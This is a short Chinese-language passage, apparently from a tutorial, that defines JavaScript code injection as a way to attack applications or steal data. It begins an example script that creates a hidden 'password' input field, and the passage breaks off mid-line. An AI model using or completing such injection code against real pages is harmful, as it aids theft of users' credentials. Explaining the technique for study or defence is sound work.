JavaScript实现代码注入
代码注入(Code Injection),是指通过一种手段,将自己的代码注入到应用程序的某个函数或代码段中,并利用这个漏洞来实现攻击或者窃取数据。
JavaScript实现代码注入可以利用浏览器的漏洞,通过修改页面的代码,来实现攻击。以下是一个简单的JavaScript代码注入示例:
<script>
var input=document.createElement('input');
input.type='hidden';
input.name='password';
input